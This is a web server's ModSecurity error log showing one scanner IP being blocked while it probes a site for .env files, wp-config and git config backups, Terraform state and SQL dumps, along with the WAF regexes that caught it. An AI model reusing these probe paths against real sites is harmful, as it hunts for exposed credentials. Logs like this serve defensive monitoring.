[Tue May 26 15:15:24.438179 2026] [security2:error] [pid 700087:tid 700198] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/service/.env"] [unique_id "ahVrtJPHQM4as9fEIIZ8-wAAHG4"]
[Tue May 26 15:15:24.438481 2026] [security2:error] [pid 700087:tid 700196] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/services/.env"] [unique_id "ahVrtJPHQM4as9fEIIZ8_AAAHGw"]
[Tue May 26 15:15:24.554418 2026] [security2:error] [pid 700087:tid 700194] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/shared/.env"] [unique_id "ahVrtJPHQM4as9fEIIZ9CAAAQ2o"]
[Tue May 26 15:15:24.555688 2026] [security2:error] [pid 700087:tid 700171] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/shop/.env"] [unique_id "ahVrtJPHQM4as9fEIIZ9CQAAQ1M"]
[Tue May 26 15:15:24.565430 2026] [security2:error] [pid 700087:tid 700199] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/src/.env"] [unique_id "ahVrtJPHQM4as9fEIIZ9EQAACm8"]
[Tue May 26 15:15:24.685408 2026] [security2:error] [pid 700087:tid 700093] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/srv/.env"] [unique_id "ahVrtJPHQM4as9fEIIZ9HgAAMAU"]
[Tue May 26 15:15:24.687306 2026] [security2:error] [pid 700087:tid 700092] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/stage/.env"] [unique_id "ahVrtJPHQM4as9fEIIZ9HwAAcAQ"]
[Tue May 26 15:15:24.687479 2026] [security2:error] [pid 700087:tid 700206] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/staging/.env"] [unique_id "ahVrtJPHQM4as9fEIIZ9IAAAcHY"]
[Tue May 26 15:15:24.702198 2026] [security2:error] [pid 700087:tid 700099] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/stg/.env"] [unique_id "ahVrtJPHQM4as9fEIIZ9JQAAGws"]
[Tue May 26 15:15:24.809491 2026] [security2:error] [pid 700087:tid 700104] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/stripe/.env"] [unique_id "ahVrtJPHQM4as9fEIIZ9MAAAfhA"]
[Tue May 26 15:15:24.812572 2026] [cgid:error] [pid 700087:tid 700105] [remote 195.178.110.199:35698] AH01264: stderr from /home1/pronuyyv/public_html/sysinfo.cgi: script not found or unable to stat
[Tue May 26 15:15:24.820769 2026] [security2:error] [pid 700087:tid 700103] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/terraform.tfstate.backup"] [unique_id "ahVrtJPHQM4as9fEIIZ9NwAAFw8"]
[Tue May 26 15:15:24.863353 2026] [security2:error] [pid 700087:tid 700213] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.pronumbers.com.au"] [uri "/test.php"] [unique_id "ahVrtJPHQM4as9fEIIZ9OwAAc30"]
[Tue May 26 15:15:24.932654 2026] [security2:error] [pid 700087:tid 700122] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/test/.env"] [unique_id "ahVrtJPHQM4as9fEIIZ9PAAAPiI"]
[Tue May 26 15:15:24.934573 2026] [security2:error] [pid 700087:tid 700113] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/user/.env"] [unique_id "ahVrtJPHQM4as9fEIIZ9QAAAPhk"]
[Tue May 26 15:15:24.937013 2026] [security2:error] [pid 700087:tid 700117] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/v1/.env"] [unique_id "ahVrtJPHQM4as9fEIIZ9QgAAPh0"]
[Tue May 26 15:15:24.939453 2026] [security2:error] [pid 700087:tid 700215] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/v2/.env"] [unique_id "ahVrtJPHQM4as9fEIIZ9RAAAZH8"]
[Tue May 26 15:15:24.942570 2026] [security2:error] [pid 700087:tid 700114] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/v3/.env"] [unique_id "ahVrtJPHQM4as9fEIIZ9RQAAJho"]
[Tue May 26 15:15:25.072204 2026] [security2:error] [pid 700087:tid 700095] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/var/www/html/.env"] [unique_id "ahVrtZPHQM4as9fEIIZ9XwAAeAc"]
[Tue May 26 15:15:25.072293 2026] [security2:error] [pid 700087:tid 700144] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/var/www/.env"] [unique_id "ahVrtZPHQM4as9fEIIZ9XgAAeDg"]
[Tue May 26 15:15:25.105511 2026] [security2:error] [pid 700087:tid 700138] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/web/.env"] [unique_id "ahVrtZPHQM4as9fEIIZ9YwAAPzI"]
[Tue May 26 15:15:25.199810 2026] [security2:error] [pid 700087:tid 700145] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/website/.env"] [unique_id "ahVrtZPHQM4as9fEIIZ9cAAAfTk"]
[Tue May 26 15:15:25.206777 2026] [security2:error] [pid 700087:tid 700161] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.pronumbers.com.au"] [uri "/wp-config.php"] [unique_id "ahVrtZPHQM4as9fEIIZ9cgAALkk"]
[Tue May 26 15:15:25.230237 2026] [security2:error] [pid 700087:tid 700158] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.pronumbers.com.au"] [uri "/wp-config.php.bak"] [unique_id "ahVrtZPHQM4as9fEIIZ9cwAAQEY"]
[Tue May 26 15:15:25.242267 2026] [security2:error] [pid 700087:tid 700178] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.pronumbers.com.au"] [uri "/wp-config.php.new"] [unique_id "ahVrtZPHQM4as9fEIIZ9dAAAeVo"]
[Tue May 26 15:15:25.313219 2026] [security2:error] [pid 700087:tid 700094] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.pronumbers.com.au"] [uri "/wp-config.php.old"] [unique_id "ahVrtZPHQM4as9fEIIZ9dQAAbwY"]
[Tue May 26 15:15:25.315759 2026] [security2:error] [pid 700087:tid 700153] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/wp-content/mysql.sql"] [unique_id "ahVrtZPHQM4as9fEIIZ9dwAAb0E"]
[Tue May 26 15:15:25.449837 2026] [security2:error] [pid 700087:tid 700232] [client 195.178.110.199:37236] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.env"] [unique_id "ahVrtZPHQM4as9fEIIZ9gQAAAA8"]
[Tue May 26 15:15:25.458136 2026] [security2:error] [pid 700087:tid 700295] [client 195.178.110.199:37282] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/backend/.env"] [unique_id "ahVrtZPHQM4as9fEIIZ9hQAAAE4"]
[Tue May 26 15:15:25.565808 2026] [security2:error] [pid 700087:tid 700251] [client 195.178.110.199:37316] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(\\\\/\\\\*\\\\!? ?(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe|union|concat|group_concat))" at REQUEST_FILENAME. [file "/opt/mod_security/hg_rules.conf"] [line "1019"] [id "9000042"] [rev "2.2.2"] [msg "SQL Comment Sequence Detected."] [data "/*update"] [hostname "www.pronumbers.com.au"] [uri "/*update.cgi*"] [unique_id "ahVrtZPHQM4as9fEIIZ9jQAAACI"]
[Tue May 26 15:15:25.620050 2026] [security2:error] [pid 700087:tid 700300] [client 195.178.110.199:37300] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.docker/.env"] [unique_id "ahVrtZPHQM4as9fEIIZ9lgAAAFM"]
[Tue May 26 15:15:25.822480 2026] [security2:error] [pid 700087:tid 700270] [client 195.178.110.199:37396] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.env.backup"] [unique_id "ahVrtZPHQM4as9fEIIZ9oQAAADU"]
[Tue May 26 15:15:25.865862 2026] [security2:error] [pid 700087:tid 700329] [client 195.178.110.199:37278] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.docker/laravel/app/.env"] [unique_id "ahVrtZPHQM4as9fEIIZ9owAAAHA"]
[Tue May 26 15:15:25.950254 2026] [security2:error] [pid 700087:tid 700228] [client 195.178.110.199:37352] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.env"] [unique_id "ahVrtZPHQM4as9fEIIZ9qQAAAAs"]
[Tue May 26 15:15:26.021043 2026] [security2:error] [pid 700087:tid 700247] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrtZPHQM4as9fEIIZ9lAAAAB4"]
[Tue May 26 15:15:26.044533 2026] [security2:error] [pid 700087:tid 700333] [client 195.178.110.199:37346] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.env.bak"] [unique_id "ahVrtpPHQM4as9fEIIZ9rQAAAHQ"]
[Tue May 26 15:15:26.080915 2026] [security2:error] [pid 700087:tid 700246] [client 195.178.110.199:37352] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.env.old"] [unique_id "ahVrtpPHQM4as9fEIIZ9tgAAAB0"]
[Tue May 26 15:15:26.095922 2026] [security2:error] [pid 700087:tid 700343] [client 195.178.110.199:37290] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.pronumbers.com.au"] [uri "/.env.php"] [unique_id "ahVrtpPHQM4as9fEIIZ9twAAAH4"]
[Tue May 26 15:15:26.801544 2026] [security2:error] [pid 700087:tid 700260] [client 202.76.173.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrtpPHQM4as9fEIIZ9vgAAACs"]
[Tue May 26 15:15:27.401884 2026] [security2:error] [pid 700087:tid 700234] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrtpPHQM4as9fEIIZ99QAAABE"]
[Tue May 26 15:15:28.106106 2026] [security2:error] [pid 700087:tid 700307] [client 195.178.110.199:37352] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.env~"] [unique_id "ahVruJPHQM4as9fEIIZ-GgAAAFo"]
[Tue May 26 15:15:28.473855 2026] [security2:error] [pid 700087:tid 700233] [client 195.178.110.199:37346] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.env.swp"] [unique_id "ahVruJPHQM4as9fEIIZ-KQAAABA"]
[Tue May 26 15:15:28.548292 2026] [security2:error] [pid 700087:tid 700278] [client 195.178.110.199:37282] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.git/config.bak"] [unique_id "ahVruJPHQM4as9fEIIZ-LwAAAD0"]
[Tue May 26 15:15:28.801785 2026] [security2:error] [pid 700087:tid 700335] [client 195.178.110.199:37378] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.git/config.old"] [unique_id "ahVruJPHQM4as9fEIIZ-RAAAAHY"]
